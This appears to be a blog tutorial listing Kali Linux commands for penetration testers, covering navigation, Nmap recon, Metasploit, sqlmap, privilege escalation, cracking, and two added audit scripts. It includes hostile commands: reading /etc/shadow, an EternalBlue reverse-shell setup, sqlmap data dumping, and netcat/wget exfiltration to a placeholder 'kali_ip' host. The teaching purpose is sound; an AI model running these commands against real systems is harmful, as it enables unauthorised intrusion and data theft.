Kali Linux Commands for Pentesters & Bug Bounty Hunters
Mastering fundamental Kali Linux commands is non-negotiable for anyone serious about penetration testing, bug bounty hunting, or red team operations. These commands are the bedrock of efficient security assessments, allowing you to navigate systems, perform reconnaissance, exploit vulnerabilities, and manage data with precision. Without a solid grasp, you'll find yourself fumbling with GUI tools or missing critical details hidden in the command line output, significantly slowing down your work and potentially missing vulnerabilities.
From my years in the field, I can tell you that the most effective pentesters aren't just great with tools; they're command-line wizards. They know how to chain commands, pipe outputs, and script repetitive tasks, saving hours and revealing insights others miss. This post will walk you through the essential Kali Linux commands, giving you practical examples and the context you need to use them effectively in real-world scenarios.
Core System & File Management Kali Linux Commands
Before you can exploit systems, you need to navigate your own and understand how to manage files. These are the bread-and-butter commands you'll use daily.
Navigating the Filesystem
- `pwd` (Print Working Directory): Shows your current location. Simple, but crucial when you're deep in directories.
- `ls` (List): Displays the contents of a directory.
  - `ls -l`: Long listing format, showing permissions, owner, size, date.
  - `ls -a`: Shows all files, including hidden ones (dotfiles).
  - `ls -la`: Combines both. I use this constantly.
- `cd` (Change Directory): Moves you between directories.
  - `cd /path/to/directory`: Absolute path.
  - `cd ../`: Go up one level.
  - `cd ~`: Go to your home directory.
  - `cd -`: Go back to the previous directory. Invaluable for quick jumps.
- `mkdir` (Make Directory): Creates new directories. Use `mkdir -p /path/to/new/dir` to create parent directories if they don't exist.
File Operations
- `cp` (Copy): Copies files or directories.
  - `cp file1.txt /tmp/file1.txt`
  - `cp -r dir1/ /tmp/dir1_copy/`: For directories, use `-r` (recursive).
- `mv` (Move): Moves or renames files/directories.
  - `mv old_name.txt new_name.txt`: Rename.
  - `mv file.txt /new/location/`: Move.
- `rm` (Remove): Deletes files or directories. Be extremely careful with this one!
  - `rm file.txt`
  - `rm -r directory/`: Recursive deletion for directories.
  - `rm -rf directory/`: Force recursive deletion without prompting. This is how you delete things permanently, quickly, and potentially disastrously if you're not paying attention.
Viewing & Manipulating File Content
- `cat` (Concatenate): Displays the entire content of a file. Good for small files. Example: `cat /etc/passwd`
- `less`: A pager that lets you view file content page by page. Much better for large files than `cat`. Use `q` to quit.
- `head` / `tail`: View the beginning or end of a file.
  - `head -n 10 file.txt`: First 10 lines.
  - `tail -n 10 file.txt`: Last 10 lines.
  - `tail -f /var/log/auth.log`: Follows a file as it's written, great for monitoring logs in real time.
- `grep` (Global Regular Expression Print): Searches for patterns within files. An absolute workhorse for log analysis and finding specific data.
  - `grep "error" /var/log/syslog`: Find lines containing "error".
  - `grep -i "admin" users.txt`: Case-insensitive search.
  - `grep -r "password" /etc/`: Recursive search for "password" in all files under /etc/.
  - `ps aux | grep "apache"`: Pipe the output of `ps aux` to `grep` to find Apache processes. This command chaining is where the real power lies.
- `find`: Searches for files and directories based on various criteria.
  - `find . -name "*.php"`: Find all PHP files in the current directory and subdirectories.
  - `find / -user root -perm /4000`: Find SUID files owned by root across the system. Critical for privilege escalation paths.
Key Takeaway: Master `grep` and `find`. They are your eyes and ears for discovering interesting files, configurations, and sensitive data across compromised systems or during reconnaissance. They'll save you countless hours.
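As an added example (not code from the original post), the following POSIX shell script runs the three `find`/`grep` patterns above against a small constructed directory tree instead of a live system, so the results can be checked. The tree, file names, the `hunter2` value and the `make_fixture`, `find_suid`, `find_php` and `grep_secret` helper names are all made up for this demonstration; `-perm -4000` is used in place of the post's `/4000` because the two are equivalent for a single permission bit and `-4000` is also accepted by BSD `find`.

```shell
#!/bin/sh
# Added example (not from the original post): exercise the post's
# `find` and `grep` patterns on a throwaway tree so the output is
# predictable. Every path and file below is constructed for the demo.

# make_fixture: build a temporary tree and print its root path.
make_fixture() {
    root=$(mktemp -d)
    mkdir -p "$root/etc/app" "$root/usr/bin" "$root/var/www"
    # constructed config containing a credential-looking line
    printf 'db_user = app\ndb_password = hunter2\n' > "$root/etc/app/app.conf"
    printf 'listen = 8080\n' > "$root/etc/app/server.conf"
    printf '<?php echo "hi"; ?>\n' > "$root/var/www/index.php"
    printf '#!/bin/sh\nexit 0\n' > "$root/usr/bin/helper"
    printf '#!/bin/sh\nexit 0\n' > "$root/usr/bin/normal"
    chmod 4755 "$root/usr/bin/helper"   # SUID bit set: what the audit should flag
    chmod 0755 "$root/usr/bin/normal"   # ordinary executable: should not be flagged
    echo "$root"
}

# find_suid DIR: regular files under DIR with the SUID bit set. stderr is
# discarded the way the post's `find / -perm /4000 2>/dev/null` does,
# because a full-filesystem run produces permission-denied noise.
find_suid() {
    find "$1" -type f -perm -4000 2>/dev/null | sort
}

# find_php DIR: the post's `find . -name "*.php"`, rooted at DIR.
find_php() {
    find "$1" -type f -name '*.php' 2>/dev/null | sort
}

# grep_secret DIR: the post's recursive, case-insensitive grep, printing
# only matching file names (-l) and skipping binary files (-I).
grep_secret() {
    grep -rIil 'password' "$1" 2>/dev/null | sort
}

# Stand-alone run: `sh this_script.sh --demo`
if [ "${1:-}" = "--demo" ]; then
    d=$(make_fixture)
    echo "SUID files:";                   find_suid "$d"
    echo "PHP files:";                    find_php "$d"
    echo "Files mentioning 'password':";  grep_secret "$d"
    rm -rf "$d"
fi
```

On a real host the same three functions are run with `/` (or `/etc`, `/var/www`) as the argument; the fixture only exists so the expected result is known in advance. Sorting the output makes it diffable against a baseline taken when the system was built, which is how the SUID list turns from a one-off check into a recurring integrity control.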
Network Reconnaissance & Scanning Kali Linux Commands
Reconnaissance is the first step of any engagement. These Kali Linux commands help you gather information about your target network and hosts.
Basic Network Utilities
- `ifconfig` / `ip a`: Display network interface configurations. `ifconfig` is older but still widely used; `ip a` is the modern replacement.
  - `ip a show eth0`: Show details for a specific interface.
- `ping`: Test network connectivity to a host.
  - `ping -c 4 8.8.8.8`: Send 4 ICMP packets.
- `netstat` / `ss`: Display network connections, routing tables, and interface statistics. `ss` is faster and more efficient than `netstat`.
  - `netstat -tunlp`: Show TCP/UDP listening ports and their associated processes (requires root).
  - `ss -tunlp`: The equivalent with `ss`.
- `dig` (Domain Information Groper): Query DNS servers for domain information.
  - `dig example.com A`: Get the A record.
  - `dig @ns1.example.com example.com AXFR`: Attempt a zone transfer (often fails but worth a try).
- `whois`: Retrieve WHOIS information for a domain. Useful for finding domain registrant details. Example: `whois example.com`
Port Scanning & Service Enumeration with Nmap
Nmap (Network Mapper) is arguably the most important reconnaissance tool. Knowing its options is critical.
- `nmap -sS target.com`: Stealth SYN scan. This is generally the fastest and least intrusive scan type.
- `nmap -sT target.com`: TCP Connect scan. A full TCP handshake, noisier but works without raw packet privileges.
- `nmap -sU target.com`: UDP scan. Essential for finding UDP services, but often very slow.
- `nmap -p- target.com`: Scan all 65535 ports. Takes longer but ensures you don't miss anything.
- `nmap -sV target.com`: Service version detection. Identifies the specific software and version running on open ports. Crucial for finding known vulnerabilities.
- `nmap -O target.com`: OS detection. Tries to guess the operating system.
- `nmap -sC target.com`: Run the default Nmap scripts. These scripts automate various common tasks, like vulnerability detection, brute-forcing, and more.
- `nmap -A target.com`: Aggressive scan (combines -O, -sV, -sC, and traceroute). A good starting point for a comprehensive scan.
- `nmap -T4 target.com`: Set the timing template (0-5, 5 is fastest, 0 is slowest). T4 is a good balance for most networks.
Here's a quick comparison of Nmap scan types:
| Scan Type | Command | Description | Detection Risk | Speed |
|---|---|---|---|---|
| SYN Scan (Half-open) | `-sS` | Sends SYN, waits for SYN/ACK, then sends RST. Doesn't complete the 3-way handshake. | Low (often stealthier) | Fast |
| TCP Connect Scan | `-sT` | Completes the 3-way TCP handshake. Relies on the OS connect() call. | Higher (full connection) | Moderate |
| UDP Scan | `-sU` | Sends UDP packets to common ports. Very slow due to UDP's stateless nature. | Moderate (IDS may flag) | Slow |
| Version Detection | `-sV` | Probes open ports to determine the service/application version. | Moderate | Adds time to scan |
| OS Detection | `-O` | Attempts to determine the target OS using TCP/IP fingerprinting. | Moderate | Adds time to scan |
For more detailed Nmap usage, check out the official Nmap documentation.
Web & DNS Enumeration
- `gobuster` / `dirb`: Directory and file brute-forcing tools for web servers.
  - `gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt`: Scan for common directories/files.
- `dnsrecon`: Comprehensive DNS enumeration script.
  - `dnsrecon -d example.com -a`: Enumerate all records, including zone transfer attempts.
Key Takeaway: Nmap is your best friend for network recon. Learn its flags inside out. Combine it with `gobuster` and `dnsrecon` for a complete picture of your target's exposed attack surface.
Vulnerability Analysis & Exploitation Kali Linux Commands
Once you've identified potential targets, it's time to find and exploit vulnerabilities.
Metasploit Framework
The Metasploit Framework is the industry standard for exploitation. Its command-line interface, msfconsole, is where you'll spend a lot of time.
- `msfconsole`: Starts the Metasploit console.
- Inside `msfconsole`:
  - `search`: Find modules. Example: `search smb`.
  - `use`: Load an exploit or auxiliary module. Example: `use exploit/windows/smb/ms17_010_eternalblue`.
  - `show options`: Display required and optional parameters for the loaded module.
  - `set RHOSTS`: Set the target IP address.
  - `set LHOST`: Set your listening IP for reverse shells.
  - `set LPORT`: Set your listening port.
  - `run` or `exploit`: Execute the module.
  - `show payloads`: Show compatible payloads for an exploit.
  - `set payload`: Select a payload. Example: `set payload windows/meterpreter/reverse_tcp`.
  - `back`: Go back to the previous context.
  - `exit`: Exit Metasploit.
Exploit Discovery & Web Vulnerability Scanners
- `searchsploit`: A command-line tool to search the Exploit-DB archive for publicly available exploits. The archive is stored locally on your Kali machine.
  - `searchsploit windows smb`: Find Windows SMB exploits.
  - `searchsploit -m 42315`: Mirror (copy) an exploit to your current directory for review.
- `sqlmap`: Automated SQL injection tool. This thing is incredibly powerful and can often find and exploit SQLi vulnerabilities that human eyes might miss.
  - `sqlmap -u "http://target.com/page.php?id=1" --batch --risk=3 --level=5 --dump`: A common command to test a URL, automatically answer prompts, use the highest risk/level checks, and dump data if successful.
  - For a deeper dive into SQL injection techniques, you might find our post SQL Injection Explained: A Deep Dive for Pentesters & Bug Bounty Hunters useful.
- `nikto`: A web server scanner that checks for known vulnerabilities, misconfigurations, and outdated software.
  - `nikto -h http://target.com`: Scan a web server.
- `wpscan`: A specialized scanner for WordPress installations, checking for plugin vulnerabilities, theme issues, and user enumeration.
  - `wpscan --url http://target.com --enumerate vp,vt,u`: Enumerate vulnerable plugins, vulnerable themes, and users.
Key Takeaway: Metasploit is your primary weapon for exploitation. Combine it with `searchsploit` for finding public exploits and `sqlmap` for automated SQLi. These tools significantly accelerate your vulnerability assessment process.
Post-Exploitation & Data Exfiltration Commands
Once you've gained initial access, the real fun begins: maintaining persistence, escalating privileges, and exfiltrating data.
System Information & Privilege Escalation
- `whoami`: Displays the current user name. Essential to know your current privilege level.
- `id`: Shows user and group IDs. More detailed than `whoami`.
- `uname -a`: Prints all system information, including the kernel version. Crucial for identifying potential kernel exploits.
- `ps aux`: Lists all running processes. Look for interesting processes, suspicious executables, or processes running with elevated privileges.
- `netstat -tunlp`: (As seen before) Identifies listening network services. Look for services running as root or on unusual ports.
- `sudo -l`: Lists the commands the current user can run with `sudo`, including any allowed without a password. A common privilege escalation vector.
- `find / -perm /4000 2>/dev/null`: Searches for SUID (Set User ID) files. These execute with the permissions of the file owner, often root.
- `cat /etc/passwd` / `cat /etc/shadow`: View user accounts and (hashed) passwords. You usually need root to view `/etc/shadow`.
- `crontab -l`: Lists scheduled jobs for the current user. Look for cron jobs running as root that you might be able to modify.
File Transfer & Data Exfiltration
Getting files onto or off a target system is a critical skill. Here are common methods:
| Method | Description | Kali Command (Example) | Target Command (Example) | Notes |
|---|---|---|---|---|
| SCP (SSH) | Securely copy files over SSH. Requires SSH access. | `scp file.txt user@target:/tmp/` | `scp user@kali_ip:/path/file.txt .` | Reliable, encrypted. Assumes an SSH server is running on the target/Kali. |
| Wget / Curl | Download files from a web server. | (Kali: host a web server) | `wget http://kali_ip/file.txt` or `curl -O http://kali_ip/file.txt` | Simple, often works even with limited shells. Kali needs a web server. |
| Python SimpleHTTPServer | Quickly set up a temporary web server on Kali. | `python3 -m http.server 80` | (Target: use wget/curl) | Very convenient for serving files from Kali. |
| Netcat (nc) | Read/write data across network connections. Flexible but unencrypted. | Kali listener: `nc -lvp 4444 > received.txt` | Target sender: `nc kali_ip 4444 < send.txt` | Good for quick transfers, but traffic is cleartext. |
| SMB Share | Use Samba to share files from Kali. | Kali: configure a Samba share. | Target (Windows): `net use X: \\kali_ip\share` then `copy X:\file.exe .` | Common in Windows environments. |
Tunneling & Port Forwarding
- `ssh -R 8080:localhost:80 user@remoteserver`: Remote port forwarding. Makes a local port on your Kali machine (e.g., 80) accessible from the remote server through the tunnel.
- `ssh -L 8080:target_internal_ip:80 user@remoteserver`: Local port forwarding. Access an internal service from your Kali machine via an SSH tunnel through a pivot host.
- `chisel` / `socat`: More advanced tools for creating tunnels and relays, often used for bypassing firewalls or moving laterally within a network.
Key Takeaway: Post-exploitation is about persistence and expanding your reach. Always look for SUID files, scheduled tasks, and exposed credentials. Learn multiple file transfer methods; one will always work when others fail.
Essential Utilities & Productivity Kali Linux Commands
Beyond the core security tools, several general Linux commands will dramatically boost your efficiency.
Text Processing & Data Manipulation
- `cut`: Extracts sections from each line of a file.
  - `cat ips.txt | cut -d'.' -f1,2`: Extract the first two octets of each IP.
- `awk`: A powerful pattern-scanning and processing language. Excellent for complex text manipulation.
  - `cat logs.txt | awk '{print $1, $4}'`: Print the first and fourth fields of each line.
- `sed` (Stream Editor): Used for basic text transformations on an input stream.
  - `sed 's/old_text/new_text/g' file.txt`: Replace all occurrences of 'old_text' with 'new_text'.
- `sort`: Sorts lines of text files.
  - `cat list.txt | sort -u`: Sort and remove duplicate lines.
- `uniq`: Reports or omits repeated lines. Often used after `sort`.
  - `cat list.txt | sort | uniq -c`: Count unique occurrences of lines.
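As an added example (not code from the original post), the following POSIX shell script chains `grep`, `awk`, `cut`, `sed`, `sort` and `uniq` over a few constructed `auth.log`-style lines to answer a question defenders ask constantly: which source addresses are producing failed SSH logins, and how are they distributed across networks? The log lines, hostname and addresses are made up, and the helper names (`failed_ips`, `failed_by_source`, `failed_by_prefix`, `redact_last_octet`) are assumptions for this demonstration.

```shell
#!/bin/sh
# Added example (not from the original post): combine the text-processing
# commands above into a small failed-login report.

# Constructed auth.log-style lines for the demo (host and addresses are made up).
SAMPLE_LOG='Jan 10 10:00:01 kali sshd[1201]: Failed password for root from 10.0.0.5 port 51234 ssh2
Jan 10 10:00:03 kali sshd[1202]: Failed password for invalid user admin from 10.0.0.5 port 51235 ssh2
Jan 10 10:00:07 kali sshd[1203]: Accepted password for alice from 10.0.0.9 port 50110 ssh2
Jan 10 10:00:09 kali sshd[1204]: Failed password for root from 192.168.1.20 port 40001 ssh2
Jan 10 10:00:12 kali sshd[1205]: Failed password for root from 10.0.0.5 port 51236 ssh2'

# failed_ips: stdin = log text; stdout = one source IP per failed login.
# grep keeps the failures; awk prints the field after the word "from",
# which is more robust than a fixed column number because "invalid user"
# lines carry two extra fields.
failed_ips() {
    grep 'Failed password' \
    | awk '{ for (i = 1; i < NF; i++) if ($i == "from") print $(i + 1) }'
}

# failed_by_source: "<count> <ip>" per source address, busiest first.
# The trailing awk normalises uniq -c's padded output to a single space.
failed_by_source() {
    failed_ips | sort | uniq -c | sort -rn | awk '{ print $1, $2 }'
}

# failed_by_prefix: the same count aggregated on the first two octets,
# using the post's `cut -d'.' -f1,2` idiom.
failed_by_prefix() {
    failed_ips | cut -d'.' -f1,2 | sort | uniq -c | sort -rn | awk '{ print $1, $2 }'
}

# redact_last_octet: sed substitution that masks the host part of each
# address, for a report that leaves the team.
redact_last_octet() {
    sed 's/\.[0-9][0-9]*$/.x/'
}

# Stand-alone run: `sh this_script.sh --demo`
#   3 10.0.0.5
#   1 192.168.1.20
if [ "${1:-}" = "--demo" ]; then
    printf '%s\n' "$SAMPLE_LOG" | failed_by_source
    printf '%s\n' "$SAMPLE_LOG" | failed_by_prefix
    printf '%s\n' "$SAMPLE_LOG" | failed_by_source | awk '{ print $2 }' | redact_last_octet
fi
```

Against a real file the input is simply `cat /var/log/auth.log | failed_by_source`, or `tail -f /var/log/auth.log | failed_ips` for a live feed; the `sort | uniq -c | sort -rn` tail of the pipeline is the same pattern the post shows with `cat list.txt | sort | uniq -c`, with the second `sort` added so the noisiest source comes first.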
Session Management & History
- `tmux` / `screen`: Terminal multiplexers that allow you to run multiple terminal sessions within a single window, detach from them, and reattach later. Indispensable for long-running processes or maintaining sessions across SSH disconnects.
- `history`: Shows your command history.
  - `!n`: Execute the n-th command from history.
  - `history | grep nmap`: Search your history for Nmap commands.
  - `CTRL+R`: Reverse search history. Start typing, and it will find previous commands. This is a massive time-saver.
- `alias`: Create custom shortcuts for frequently used commands.
  - `alias update="sudo apt update && sudo apt full-upgrade -y"`: Create an alias for updating Kali.
  - Add aliases to your `~/.bashrc` or `~/.zshrc` for persistence.
Archiving & Compression
- `tar`: Archive utility.
  - `tar -czvf archive.tar.gz /path/to/directory`: Create a gzipped archive.
  - `tar -xzvf archive.tar.gz`: Extract a gzipped archive.
- `zip` / `unzip`: For working with ZIP archives.
Password Cracking & Hashing
- `john` (John the Ripper): A fast password cracker.
  - `john --wordlist=rockyou.txt hash.txt`: Crack hashes using a wordlist.
- `hashcat`: The world's fastest password cracker, running on CPUs and GPUs.
  - `hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt`: Crack MD5 hashes with rockyou.txt (mode 0 is MD5).
- `openssl`: A versatile toolkit for cryptography. Useful for generating certificates, hashing, encryption, and more.
  - `openssl passwd -1 -salt mysalt "password"`: Generate an MD5-crypt hash.
Key Takeaway: Don't overlook productivity tools. `tmux` will save your sanity, `grep`/`awk`/`sed` will make you a data processing guru, and `history`/`alias` will speed up your workflow significantly.
Staying Updated & Troubleshooting Kali Linux Commands
Keeping your Kali system current and knowing how to troubleshoot problems is vital for a smooth workflow.
System Updates & Package Management
- `sudo apt update`: Refreshes the list of available packages from your configured repositories. Do this frequently.
- `sudo apt full-upgrade -y`: Upgrades all installed packages to their latest versions, handling dependency changes. The `-y` flag answers 'yes' to prompts.
- Pro-tip: Run `sudo apt update && sudo apt full-upgrade -y` regularly, perhaps once a week, to keep your tools sharp and secure.
- `sudo apt install`: Installs a new package. Example: `sudo apt install wireshark`.
- `sudo apt remove`: Removes a package.
- `sudo apt autoremove`: Removes packages that were automatically installed to satisfy dependencies for other packages and are no longer needed. Cleans up your system.
- `dpkg -l`: Lists all installed Debian packages. Great for auditing what's on your system.
Troubleshooting & Service Management
- `systemctl status`: Checks the status of a systemd service (e.g., Apache, SSH).
  - `systemctl start apache2`: Start a service.
  - `systemctl stop apache2`: Stop a service.
  - `systemctl enable apache2`: Enable a service to start on boot.
- `journalctl -xe`: Displays recent systemd journal entries, including errors and warnings. A primary source for debugging system issues.
- `dmesg`: Prints the kernel ring buffer messages. Useful for hardware-related issues or driver problems.
Key Takeaway: Regular updates are critical for a penetration testing distro like Kali. New exploits and tools appear constantly, and outdated software can introduce vulnerabilities or compatibility issues. Don't skip your `apt update && apt full-upgrade`!
Frequently Asked Questions
What are the most essential Kali Linux commands for beginners?
For beginners, focus on core system navigation and file management commands like ls, cd, pwd, cp, mv, rm, and viewing file content with cat or less. Also, grasp network basics with ping and the powerful port scanner nmap, starting with simple SYN scans.
How can I update my Kali Linux system and tools?
To update your Kali Linux system and all its tools, open a terminal and run sudo apt update && sudo apt full-upgrade -y. This command first refreshes the package lists and then upgrades all installed packages to their latest versions, ensuring you have the most current and secure tools.
Is Kali Linux difficult to learn for someone new to Linux?
Kali Linux can be challenging for complete Linux newcomers due to its command-line focus and specialized tools. However, with dedication to learning fundamental Linux commands and understanding networking concepts, it's certainly manageable. Start with basic commands, practice regularly, and explore available tutorials to build your skills gradually.
What is the difference between apt update and apt upgrade?
apt update fetches the latest package information from the repositories but doesn't install or upgrade anything. It essentially updates the list of available packages. apt upgrade (or apt full-upgrade for Kali) then uses this updated list to actually install newer versions of your installed packages.